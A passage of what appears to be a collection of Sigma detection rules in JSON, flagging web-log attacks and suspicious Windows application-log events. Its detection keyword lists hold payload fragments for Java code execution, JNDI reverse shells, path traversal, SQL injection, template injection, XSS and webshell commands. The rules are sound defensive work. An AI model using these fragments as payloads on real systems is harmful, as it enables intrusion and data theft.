    "content": "title: F5 BIG-IP iControl Rest API Command Execution - Webserver\nid: 85254a62-22be-4239-b79c-2ec17e566c37\nrelated:\n    - id: b59c98c6-95e8-4d65-93ee-f594dfb96b17\n      type: similar\nstatus: test\ndescription: Detects POST requests to the F5 BIG-IP iControl Rest API \"bash\" endpoint, which allows the execution of commands on the BIG-IP\nreferences:\n    - https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash\n    - https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029\n    - https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516\nauthor: Nasreddine Bencherchali (Nextron Systems), Thurein Oo\ndate: 2023-11-08\ntags:\n    - attack.execution\n    - attack.t1190\n    - attack.initial-access\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|endswith: '/mgmt/tm/util/bash'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the BIG IP REST API to execute command for administration purposes\nlevel: medium\n"
  },
  {
    "path": "rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml",
    "content": "title: Successful IIS Shortname Fuzzing Scan\nid: 7cb02516-6d95-4ffc-8eee-162075e111ac\nstatus: test\ndescription: When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"\nreferences:\n    - https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml\n    - https://www.exploit-db.com/exploits/19525\n    - https://github.com/lijiejie/IIS_shortname_Scanner\nauthor: frack113\ndate: 2021-10-06\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: '~1'\n        cs-uri-query|endswith: 'a.aspx'\n        cs-method:\n            - GET\n            - OPTIONS\n        # Success only\n        sc-status:\n            - 200\n            - 301\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/web/webserver_generic/web_java_payload_in_access_logs.yml",
    "content": "title: Java Payload Strings\nid: 583aa0a2-30b1-4d62-8bf3-ab73689efe6c\nstatus: test\ndescription: Detects possible Java payloads in web access logs\nreferences:\n    - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/\n    - https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/\n    - https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md\n    - https://twitter.com/httpvoid0x2f/status/1532924261035384832\n    - https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035\nauthor: frack113, Harjot Singh, \"@cyb3rjy0t\" (update)\ndate: 2022-06-04\nmodified: 2023-01-19\ntags:\n    - cve.2022-26134\n    - cve.2021-26084\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    keywords:\n        - '%24%7B%28%23a%3D%40'\n        - '${(#a=@'\n        - '%24%7B%40java'\n        - '${@java'\n        - 'u0022java'\n        - '%2F%24%7B%23'\n        - '/${#'\n        - 'new+java.'\n        - 'getRuntime().exec('\n        - 'getRuntime%28%29.exec%28'\n    condition: keywords\nfalsepositives:\n    - Legitimate apps\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_jndi_exploit.yml",
    "content": "title: JNDIExploit Pattern\nid: 412d55bc-7737-4d25-9542-5b396867ce55\nstatus: test\ndescription: Detects exploitation attempts using the JNDI-Exploit-Kit\nreferences:\n    - https://github.com/pimps/JNDI-Exploit-Kit\n    - https://web.archive.org/web/20231015205935/https://githubmemory.com/repo/FunctFan/JNDIExploit\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-12\nmodified: 2022-12-25\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    keywords:\n        - '/Basic/Command/Base64/'\n        - '/Basic/ReverseShell/'\n        - '/Basic/TomcatMemshell'\n        - '/Basic/JettyMemshell'\n        - '/Basic/WeblogicMemshell'\n        - '/Basic/JBossMemshell'\n        - '/Basic/WebsphereMemshell'\n        - '/Basic/SpringMemshell'\n        - '/Deserialization/URLDNS/'\n        - '/Deserialization/CommonsCollections1/Dnslog/'\n        - '/Deserialization/CommonsCollections2/Command/Base64/'\n        - '/Deserialization/CommonsBeanutils1/ReverseShell/'\n        - '/Deserialization/Jre8u20/TomcatMemshell'\n        - '/TomcatBypass/Dnslog/'\n        - '/TomcatBypass/Command/'\n        - '/TomcatBypass/ReverseShell/'\n        - '/TomcatBypass/TomcatMemshell'\n        - '/TomcatBypass/SpringMemshell'\n        - '/GroovyBypass/Command/'\n        - '/WebsphereBypass/Upload/'\n    condition: keywords\nfalsepositives:\n    - Legitimate apps that use these paths\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_path_traversal_exploitation_attempt.yml",
    "content": "title: Path Traversal Exploitation Attempts\nid: 7745c2ea-24a5-4290-b680-04359cb84b35\nstatus: test\ndescription: Detects path traversal exploitation attempts\nreferences:\n    - https://github.com/projectdiscovery/nuclei-templates\n    - https://book.hacktricks.xyz/pentesting-web/file-inclusion\nauthor: Subhash Popuri (@pbssubhash), Florian Roth (Nextron Systems), Thurein Oo, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-09-25\nmodified: 2023-08-31\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - '../../../../../lib/password'\n            - '../../../../windows/'\n            - '../../../etc/'\n            - '..%252f..%252f..%252fetc%252f'\n            - '..%c0%af..%c0%af..%c0%afetc%c0%af'\n            - '%252e%252e%252fetc%252f'\n    condition: selection\nfalsepositives:\n    - Expected to be continuously seen on systems exposed to the Internet\n    - Internal vulnerability scanners\nlevel: medium\n"
  },
  {
    "path": "rules/web/webserver_generic/web_source_code_enumeration.yml",
    "content": "title: Source Code Enumeration Detection by Keyword\nid: 953d460b-f810-420a-97a2-cfca4c98e602\nstatus: test\ndescription: Detects source code enumeration that uses GET requests, by keyword searches in URL strings\nreferences:\n    - https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html\n    - https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1\nauthor: James Ahearn\ndate: 2019-06-08\nmodified: 2022-10-05\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: webserver\ndetection:\n    keywords:\n        - '.git/'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/web/webserver_generic/web_sql_injection_in_access_logs.yml",
    "content": "title: SQL Injection Strings In URI\nid: 5513deaf-f49a-46c2-a6c8-3f111b5cb453\nstatus: test\ndescription: Detects potential SQL injection attempts via GET requests in access logs.\nreferences:\n    - https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/\n    - https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/\n    - https://brightsec.com/blog/sql-injection-payloads/\n    - https://github.com/payloadbox/sql-injection-payload-list\n    - https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection\nauthor: Saw Win Naung, Nasreddine Bencherchali (Nextron Systems), Thurein Oo (Yoma Bank)\ndate: 2020-02-22\nmodified: 2023-09-04\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'GET'\n    keywords:\n        - '@@version'\n        - '%271%27%3D%271'\n        - '=select '\n        - '=select('\n        - '=select%20'\n        - 'concat_ws('\n        - 'CONCAT(0x'\n        - 'from mysql.innodb_table_stats'\n        - 'from%20mysql.innodb_table_stats'\n        - 'group_concat('\n        - 'information_schema.tables'\n        - 'json_arrayagg('\n        - 'or 1=1#'\n        - 'or%201=1#'\n        - 'order by '\n        - 'order%20by%20'\n        - 'select * '\n        - 'select database()'\n        - 'select version()'\n        - 'select%20*%20'\n        - 'select%20database()'\n        - 'select%20version()'\n        - 'select%28sleep%2810%29'\n        - 'SELECTCHAR('\n        - 'table_schema'\n        - 'UNION ALL SELECT'\n        - 'UNION SELECT'\n        - 'UNION%20ALL%20SELECT'\n        - 'UNION%20SELECT'\n        - \"'1'='1\"\n    filter_main_status:\n        sc-status: 404\n    condition: selection and keywords and not 1 of filter_main_*\nfalsepositives:\n    - Java scripts and CSS Files\n    - User searches in search boxes of the respective website\n    - Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_ssti_in_access_logs.yml",
    "content": "title: Server Side Template Injection Strings\nid: ada3bc4f-f0fd-42b9-ba91-e105e8af7342\nstatus: test\ndescription: Detects SSTI attempts sent via GET requests in access logs\nreferences:\n    - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection\n    - https://github.com/payloadbox/ssti-payloads\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-14\ntags:\n    - attack.defense-evasion\n    - attack.t1221\nlogsource:\n    category: webserver\ndetection:\n    select_method:\n        cs-method: 'GET'\n    keywords:\n        - '={{'\n        - '=%7B%7B'\n        - '=${'\n        - '=$%7B'\n        - '=<%='\n        - '=%3C%25='\n        - '=@('\n        - 'freemarker.template.utility.Execute'\n        - .getClass().forName('javax.script.ScriptEngineManager')\n        - 'T(org.apache.commons.io.IOUtils)'\n    filter:\n        sc-status: 404\n    condition: select_method and keywords and not filter\nfalsepositives:\n    - User searches in search boxes of the respective website\n    - Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_susp_useragents.yml",
    "content": "title: Suspicious User-Agents Related To Recon Tools\nid: 19aa4f58-94ca-45ff-bc34-92e533c0994a\nstatus: test\ndescription: Detects known suspicious (default) user-agents related to scanning/recon tools\nreferences:\n    - https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb\n    - https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst\n    - https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92\nauthor: Nasreddine Bencherchali (Nextron Systems), Tim Shelton\ndate: 2022-07-19\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-user-agent|contains:\n            # Add more tools as you see fit\n            - 'Wfuzz/'\n            - 'WPScan v'\n            - 'Recon-ng/v'\n            - 'GIS - AppSec Team - Project Vision'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/web/webserver_generic/web_susp_windows_path_uri.yml",
    "content": "title: Suspicious Windows Strings In URI\nid: 9f6a34b4-2688-4eb7-a7f5-e39fef573d0e\nstatus: test\ndescription: Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication\nreferences:\n    - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-06\nmodified: 2023-01-02\ntags:\n    - attack.persistence\n    - attack.exfiltration\n    - attack.t1505.003\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - '=C:/Users'\n            - '=C:/Program%20Files'\n            - '=C:/Windows'\n            - '=C%3A%5CUsers'\n            - '=C%3A%5CProgram%20Files'\n            - '=C%3A%5CWindows'\n    condition: selection\nfalsepositives:\n    - Legitimate applications and websites that use Windows paths in their URL\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_webshell_regeorg.yml",
    "content": "title: Webshell ReGeorg Detection Via Web Logs\nid: 2ea44a60-cfda-11ea-87d0-0242ac130003\nstatus: test\ndescription: Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.\nreferences:\n    - https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3\n    - https://github.com/sensepost/reGeorg\nauthor: Cian Heasley\ndate: 2020-08-04\nmodified: 2023-01-02\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - 'cmd=read'\n            - 'connect&target'\n            - 'cmd=connect'\n            - 'cmd=disconnect'\n            - 'cmd=forward'\n    filter:\n        cs-referer: null\n        cs-user-agent: null\n        cs-method: POST\n    condition: selection and filter\nfalsepositives:\n    - Web applications that use the same URL parameters as ReGeorg\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_win_webshells_in_access_logs.yml",
    "content": "title: Windows Webshell Strings\nid: 7ff9db12-1b94-4a79-ba68-a2402c5d6729\nstatus: test\ndescription: Detects common commands used in Windows webshells\nreferences:\n    - https://bad-jubies.github.io/RCE-NOW-WHAT/\n    - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2017-02-19\nmodified: 2022-11-18\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    category: webserver\ndetection:\n    selection_method:\n        cs-method: 'GET'\n    selection_keywords:\n        # The \"%20\" is URL encoded version of the space\n        # The \"%2B\" is URL encoded version of the \"+\"\n        - '=whoami'\n        - '=net%20user'\n        - '=net+user'\n        - '=net%2Buser'\n        - '=cmd%20/c%'\n        - '=cmd+/c+'\n        - '=cmd%2B/c%'\n        - '=cmd%20/r%'\n        - '=cmd+/r+'\n        - '=cmd%2B/r%'\n        - '=cmd%20/k%'\n        - '=cmd+/k+'\n        - '=cmd%2B/k%'\n        - '=powershell%'\n        - '=powershell+'\n        - '=tasklist%'\n        - '=tasklist+'\n        - '=wmic%'\n        - '=wmic+'\n        - '=ssh%'\n        - '=ssh+'\n        - '=python%'\n        - '=python+'\n        - '=python3%'\n        - '=python3+'\n        - '=ipconfig'\n        - '=wget%'\n        - '=wget+'\n        - '=curl%'\n        - '=curl+'\n        - '=certutil'\n        - '=copy%20%5C%5C'\n        - '=dsquery%'\n        - '=dsquery+'\n        - '=nltest%'\n        - '=nltest+'\n    condition: all of selection_*\nfalsepositives:\n    - Web sites like wikis with articles on os commands and pages that include the os commands in the URLs\n    - User searches in search boxes of the respective website\nlevel: high\n"
  },
  {
    "path": "rules/web/webserver_generic/web_xss_in_access_logs.yml",
    "content": "title: Cross Site Scripting Strings\nid: 65354b83-a2ea-4ea6-8414-3ab38be0d409\nstatus: test\ndescription: Detects XSS attempts injected via GET requests in access logs\nreferences:\n    - https://github.com/payloadbox/xss-payload-list\n    - https://portswigger.net/web-security/cross-site-scripting/contexts\nauthor: Saw Win Naung, Nasreddine Bencherchali\ndate: 2021-08-15\nmodified: 2022-06-14\ntags:\n    - attack.initial-access\n    - attack.t1189\nlogsource:\n    category: webserver\ndetection:\n    select_method:\n        cs-method: 'GET'\n    keywords:\n        - '=<script>'\n        - '=%3Cscript%3E'\n        - '=%253Cscript%253E'\n        - '<iframe '\n        - '%3Ciframe '\n        - '<svg '\n        - '%3Csvg '\n        - 'document.cookie'\n        - 'document.domain'\n        - ' onerror='\n        - ' onresize='\n        - ' onload=\"'\n        - 'onmouseover='\n        - '${alert'\n        - 'javascript:alert'\n        - 'javascript%3Aalert'\n    filter:\n        sc-status: 404\n    condition: select_method and keywords and not filter\nfalsepositives:\n    - JavaScripts,CSS Files and PNG files\n    - User searches in search boxes of the respective website\n    - Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as \"User Agent\" strings and more response codes\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/Other/win_av_relevant_match.yml",
    "content": "title: Relevant Anti-Virus Signature Keywords In Application Log\nid: 78bc5783-81d9-4d73-ac97-59f6db4f72a8\nstatus: test\ndescription: |\n    Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.\nreferences:\n    - https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31\n    - https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed\n    - https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01\n    - https://www.nextron-systems.com/?s=antivirus\nauthor: Florian Roth (Nextron Systems), Arnim Rupp\ndate: 2017-02-19\nmodified: 2024-12-25\ntags:\n    - attack.resource-development\n    - attack.t1588\nlogsource:\n    product: windows\n    service: application\ndetection:\n    keywords:\n        - 'Adfind'\n        - 'ASP/BackDoor '\n        - 'ATK/'\n        - 'Backdoor.ASP'\n        - 'Backdoor.Cobalt'\n        - 'Backdoor.JSP'\n        - 'Backdoor.PHP'\n        - 'Blackworm'\n        - 'Brutel'\n        - 'BruteR'\n        - 'Chopper'\n        - 'Cobalt'\n        - 'COBEACON'\n        - 'Cometer'\n        - 'CRYPTES'\n        - 'Cryptor'\n        - 'Destructor'\n        - 'DumpCreds'\n        - 'Exploit.Script.CVE'\n        - 'FastReverseProxy'\n        - 'Filecoder'\n        - 'GrandCrab '\n        - 'HackTool'\n        - 'HKTL'\n        - 'HTool-'\n        - '/HTool'\n        - '.HTool'\n        - 'IISExchgSpawnCMD'\n        - 'Impacket'\n        - 'JSP/BackDoor '\n        - 'Keylogger'\n        - 'Koadic'\n        - 'Krypt'\n        - 'Lazagne'\n        - 'Metasploit'\n        - 'Meterpreter'\n        - 'MeteTool'\n        - 'mikatz'\n        - 'Mimikatz'\n        - 'Mpreter'\n        - 'MsfShell'\n        - 'Nighthawk'\n        - 'Packed.Generic.347'\n        - 'PentestPowerShell'\n        - 'Phobos'\n        - 'PHP/BackDoor '\n        - 'Potato'\n        - 'PowerSploit'\n        - 'PowerSSH'\n        - 'PshlSpy'\n        - 'PSWTool'\n        - 'PWCrack'\n        - 'PWDump'\n        - 'Ransom'\n        - 'Rozena'\n        - 'Ryzerlo'\n        - 'Sbelt'\n        - 'Seatbelt'\n        - 'SecurityTool '\n        - 'SharpDump'\n        - 'Shellcode'\n        - 'Sliver'\n        - 'Splinter'\n        - 'Swrort'\n        - 'Tescrypt'\n        - 'TeslaCrypt'\n        - 'TurtleLoader'\n        - 'Valyria'\n        - 'Webshell'\n        # - 'FRP.'\n        # - 'Locker'\n        # - 'PWS.'\n        # - 'PWSX'\n        # - 'Razy'\n        # - 'Ryuk'\n    filter_optional_generic:\n        - 'anti_ransomware_service.exe'\n        - 'Anti-Ransomware'\n        - 'Crack'\n        - 'cyber-protect-service.exe'\n        - 'encryptor'\n        - 'Keygen'\n    filter_optional_information:\n        Level: 4  # Information level\n    filter_optional_restartmanager:\n        Provider_Name: 'Microsoft-Windows-RestartManager'\n    condition: keywords and not 1 of filter_optional_*\nfalsepositives:\n    - Some software piracy tools (key generators, cracks) are classified as hack tools\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/application_error/win_application_error_lsass_crash.yml",
    "content": "title: LSASS Process Crashed - Application\nid: a18e0862-127b-43ca-be12-1a542c75c7c5\nstatus: experimental\ndescription: |\n    Detects Windows error reporting events where the process that crashed is LSASS (Local Security Authority Subsystem Service).\n    This could be the cause of a provoked crash by techniques such as Lsass-Shtinkering to dump credentials.\nreferences:\n    - https://github.com/deepinstinct/Lsass-Shtinkering\n    - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-07\nmodified: 2025-12-03\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name: 'Application Error'\n        EventID: 1000\n        AppName: 'lsass.exe'\n        ExceptionCode: 'c0000001' # STATUS_UNSUCCESSFUL\n    condition: selection\nfalsepositives:\n    - Rare legitimate crashing of the lsass process\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/application_error/win_application_error_msmpeng_crash.yml",
    "content": "title: Microsoft Malware Protection Engine Crash\nid: 545a5da6-f103-4919-a519-e9aec1026ee4\nrelated:\n    - id: 6c82cf5c-090d-4d57-9188-533577631108\n      type: similar\nstatus: test\ndescription: This rule detects a suspicious crash of the Microsoft Malware Protection Engine\nreferences:\n    - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5\n    - https://technet.microsoft.com/en-us/library/security/4022344\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-05-09\nmodified: 2023-04-14\ntags:\n    - attack.defense-evasion\n    - attack.t1211\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name: 'Application Error'\n        EventID: 1000\n        Data|contains|all:\n            - 'MsMpEng.exe'\n            - 'mpengine.dll'\n    condition: selection\nfalsepositives:\n    - MsMpEng might crash if the \"C:\\\" partition is full\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse.yml",
    "content": "title: Ntdsutil Abuse\nid: e6e88853-5f20-4c4a-8d26-cd469fd8d31f\nstatus: test\ndescription: Detects potential abuse of ntdsutil to dump ntds.dit database\nreferences:\n    - https://twitter.com/mgreen27/status/1558223256704122882\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-14\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name: 'ESENT'\n        EventID:\n            - 216\n            - 325\n            - 326\n            - 327\n        Data|contains: 'ntds.dit'\n    condition: selection\nfalsepositives:\n    - Legitimate backup operation/creating shadow copies\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml",
    "content": "title: Dump Ntds.dit To Suspicious Location\nid: 94dc4390-6b7c-4784-8ffc-335334404650\nstatus: test\ndescription: Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location\nreferences:\n    - https://twitter.com/mgreen27/status/1558223256704122882\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-14\nmodified: 2023-10-23\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection_root:\n        Provider_Name: 'ESENT'\n        EventID: 325 # New Database Created\n        Data|contains: 'ntds.dit'\n    selection_paths:\n        Data|contains:\n            # Add more locations that you don't use in your env or that are just suspicious\n            - ':\\ntds.dit'\n            - '\\Appdata\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Perflogs\\'\n            - '\\Temp\\'\n            - '\\Users\\Public\\'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate backup operation/creating shadow copies\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml",
    "content": "title: Audit CVE Event\nid: 48d91a3a-2363-43ba-a456-ca71ac3da5c2\nstatus: test\ndescription: |\n    Detects events generated by user-mode applications when they call the CveEventWrite API because an attempt to exploit a known vulnerability was detected.\n    MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability).\n    Unfortunately, that is about the only instance of CVEs being written to this log.\nreferences:\n    - https://twitter.com/VM_vivisector/status/1217190929330655232\n    - https://twitter.com/DidierStevens/status/1217533958096924676\n    - https://twitter.com/FlemmingRiis/status/1217147415482060800\n    - https://www.youtube.com/watch?v=ebmW42YYveI # \"CVEs in Windows Event Logs? What You Need to Know\" by 13Cubed.\n    - https://nullsec.us/windows-event-log-audit-cve/\nauthor: Florian Roth (Nextron Systems), Zach Mathis\ndate: 2020-01-15\nmodified: 2022-10-22\ntags:\n    - attack.execution\n    - attack.t1203\n    - attack.privilege-escalation\n    - attack.t1068\n    - attack.defense-evasion\n    - attack.t1211\n    - attack.credential-access\n    - attack.t1212\n    - attack.lateral-movement\n    - attack.t1210\n    - attack.impact\n    - attack.t1499.004\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name:\n            - 'Microsoft-Windows-Audit-CVE'\n            - 'Audit-CVE'\n        EventID: 1\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml",
    "content": "title: Backup Catalog Deleted\nid: 9703792d-fd9a-456d-a672-ff92efe4806a\nstatus: test\ndescription: Detects backup catalog deletions\nreferences:\n    - https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx\n    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100\nauthor: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)\ndate: 2017-05-12\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070.004\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        EventID: 524\n        Provider_Name: Microsoft-Windows-Backup\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml",
    "content": "title: Restricted Software Access By SRP\nid: b4c8da4a-1c12-46b0-8a2b-0a8521d03442\nstatus: test\ndescription: Detects restricted access to applications by the Software Restriction Policies (SRP) policy\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv\nauthor: frack113\ndate: 2023-01-12\ntags:\n    - attack.lateral-movement\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1072\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name: 'Microsoft-Windows-SoftwareRestrictionPolicies'\n        EventID:\n            - 865 # Access to %1 has been restricted by your Administrator by the default software restriction policy level\n            - 866 # Access to %1 has been restricted by your Administrator by location with policy rule %2 placed on path %3.\n            - 867 # Access to %1 has been restricted by your Administrator by software publisher policy.\n            - 868 # Access to %1 has been restricted by your Administrator by policy rule %2.\n            - 882 # Access to %1 has been restricted by your Administrator by policy rule %2.\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/application/msiinstaller/win_builtin_remove_application.yml",
    "content": "title: Application Uninstalled\nid: 570ae5ec-33dc-427c-b815-db86228ad43e\nstatus: test\ndescription: An application has been removed. Check if it is critical.\nreferences:\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/Microsoft-Windows-MsiServer.xml\n    - https://learn.microsoft.com/en-us/windows/win32/msi/event-logging\nauthor: frack113\ndate: 2022-01-28\nmodified: 2022-09-17\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name: 'MsiInstaller'\n        EventID:\n            - 1034 # Windows Installer removed the product\n            - 11724 # Product Removal Successful\n    condition: selection\nfalsepositives:\n    - Unknown\n# Level is low as this event can be very verbose; reviewing the top 10 or so \"Product Name\" values gives a quick overview\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml",
    "content": "title: MSI Installation From Suspicious Locations\nid: c7c8aa1c-5aff-408e-828b-998e3620b341\nstatus: test\ndescription: Detects MSI package installation from suspicious locations\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-31\nmodified: 2023-10-23\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        Provider_Name: 'MsiInstaller'\n        EventID:\n            - 1040\n            - 1042\n        Data|contains:\n            # Add more suspicious paths\n            - ':\\Windows\\TEMP\\'\n            - '\\\\\\\\'\n            - '\\Desktop\\'\n            - '\\PerfLogs\\'\n            - '\\Users\\Public\\'\n            # - '\\AppData\\Local\\Temp\\'  # too many FPs\n            # - '\\Downloads\\'  # too many FPs, typical legitimate staging directory\n    filter_winget:\n        Data|contains: 